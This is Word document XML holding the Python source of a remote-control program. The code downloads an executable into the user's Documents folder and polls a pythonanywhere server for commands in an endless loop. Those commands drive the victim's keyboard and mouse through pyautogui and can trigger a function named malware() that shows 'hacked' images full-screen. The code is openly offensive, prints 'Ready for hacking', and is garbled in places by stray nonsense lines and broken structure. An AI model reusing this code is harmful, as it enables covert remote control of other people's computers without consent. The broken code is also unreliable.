    <w:p w14:paraId="31248870" w14:textId="61930A86" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6107AEB7" w14:textId="7EC67BDE" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8AE83D" w14:textId="2EFC37EA" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF9D7FD" w14:textId="37DFBF6E" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBFB37C" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F65D1A2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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4027FC3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URL = "https://my.parallels.com/action/access/download/EME4UFoPDx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59044F1B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response = requests.get(URL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B9953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open(rf"C:\Users\{os.getlogin()}\Documents\app.exe", "wb").write(response.content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7615C8CF" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC5AE3A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is_connected = " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B9B8D2" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF40A49" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="363B5CA0" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5D324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def get_data(webpage):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785DB01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url = webpage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D386ED1" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39001E78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req = requests.get(url, 'html.parser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549DB390" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FE9093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return req.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD3B83" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE0B77B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get_data("https://my.parallels.com/action/access/download/EME4UFoPDx")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EBA794" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B889917" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7265F204" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C026B6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mode_for = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DE3FAF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liste = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503DCF13" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3DF613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screen_size = pyautogui.size()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A161F80" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC36138" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B757483" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1403B742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def malware():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A2794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import pygame.image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DED5958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import urllib.request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2589531F" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2046910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imgURL = rf"http://pythonanywherean.pythonanywhere.com/static/Battle/images/hacked1.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E374975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urllib.request.urlretrieve(imgURL, rf"C:\Users\{os.getlogin()}\Documents\hacked1.png")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A09EE03" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FCC122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imgURL2 = rf"http://pythonanywherean.pythonanywhere.com/static/Battle/images/hacked2.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6089F93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urllib.request.urlretrieve(imgURL2, rf"C:\Users\{os.getlogin()}\Documents\hacked2.png")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282B625E" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23697562" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC90426" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB0ED95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img1 = pygame.image.load(rf"C:\Users\{os.getlogin()}\Documents\hacked1.png")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07976DC9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img1 = pygame.transform.rotozoom(img1, 0, screen_size[0]/img1.get_size()[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B66D9" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688580D3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img2 = pygame.image.load(rf"C:\Users\{os.getlogin()}\Documents\hacked2.png")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC115E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img2 = pygame.transform.rotozoom(img2, 0, screen_size[0]/img1.get_size()[0]/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38232083" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A3018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print(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D8962" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390C2E13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win = pygame.display.set_mode((0, 0), pygame.FULLSCREEN) # set window size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23504E98" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE3DFD4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pygame.display.set_caption("Hacker") # title of the screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730EB436" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1624608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pygame.init() # initializes pygame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C98A81D" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57761E6D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# the function that will update the screen every frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697A16C8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def aff(win):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC8F909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win.fill((0, 0, 0)) # fills the screen with black</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380683D8" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFCCA6F" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38EF03C7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win.blit(img1, (0, 0)) #item[2] is the loaded image of this item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4470C215" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D282D6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if time.time()-time_AA&gt;5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF2121A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win.blit(img2, (50, 50))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AD386E" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275A844B" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5691EACA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pygame.display.update() # finally you need this line to update the display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E93468" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8C3846" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D579BA3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data = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FA9D9F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time_AA = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DBBB1" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B967AD2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while not("reload" in data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2BE8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keys = pygame.key.get_pressed() # gets all pressed keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19832A24" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F4614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aff (win) # updates the screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55457F9E" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="663DB686" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6890229F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# I don't know why but you have to write the following lines otherwise the code won't work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8D15D5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for event in pygame.event.get():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8B980B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if event.type == pygame.QUIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4554CE04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run = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61703822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pygame.quit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29265189" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E12BECD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data = get_data(f"http://pythonanywherean.pythonanywhere.com/RecvData/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702E83A1" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="437CAA6E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time.sleep(0.01) # to slow down the main loop (not really needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A30A04" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C3FCF1" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECB79F3" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F12354C" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38936C2B" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA97302" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21ADCED9" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E51A60" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2731898D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print()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276B44D" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EEFABCB" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9E389B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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE4C15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with open(rf"C:\Users\{os.getlogin()}\Documents\OfflineMode.txt", "w+") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E976D5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f.write(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E807B8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print("Ready for hacking, connected to servor")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220EF18F" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3255D1CB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while 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215E203B" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330735DA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time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9AB70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get_data("http://pythonanywherean.pythonanywhere.com/Connected/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622A6DB" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A67D7C2" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCCE9C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data = get_data(f"http://pythonanywherean.pythonanywhere.com/RecvData/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C31F30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get_data("http://pythonanywherean.pythonanywhere.com/DeleteData/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23461F8D" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5435385E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if "$reload$" in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C0475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print("found")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237CA7BF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azeazeazeazeazeaeza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C2282" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0479B8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for el in range(len(data)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE4CEE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if mode_for==0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A1A75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if data[el]=="$" or data[el]=="ù":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5C5B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mode_for = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAF7ED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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A2954B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pyautogui.write(data[el])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4620C9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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10647DE3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if data[el] == "$" or data[el] == "ù":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E3026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mode_for = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA14F8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if data[el] == "$":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69934EF9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print(liste)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5349A157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if liste == "win":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF5C40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pyautogui.press("win")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A42CE54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elif liste == "enter":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2468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pyautogui.press("enter")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C87A278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elif liste == "reload":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A70CD1B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azeazeazeazeazeaeza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447953D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elif liste.startswith("rm"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D92EA99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pyautogui.press("backspace", presses=int(liste[2]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083EDAF5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elif liste.startswith("move"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E62A7B7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liste = liste.split(".")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C918F5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pyautogui.moveTo(int(liste[1])*screen_size[0]/100, int(liste[2])*screen_size[1]/100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CF440D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elif liste.startswith("malware"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3472606B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#start_new_thread(malware, ())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E9BD78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malware()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C165AD7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azeazeazeazeazeaeza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7D76E" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42004B09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elif liste.startswith('*'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B7B54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liste = liste.split(".")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC70967" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C07DA0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if len(liste)==2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A0285C" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:r w:rsidRPr="003E71CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:t>pyautogui.press(liste[0][1:], presses=int(liste[1]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723924F7" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r w:rsidRPr="003E71CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C05E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        pyautogui.press(liste[0][1:], presses=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208A3CD1" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="724BDA9D" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630EBE2E" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A2E25F" w14:textId="77777777" w:rsidR="003E71CA" w:rsidRPr="003E71CA" w:rsidRDefault="003E71CA" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED3336C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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17689911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print("executing script")</w:t>
      </w:r>
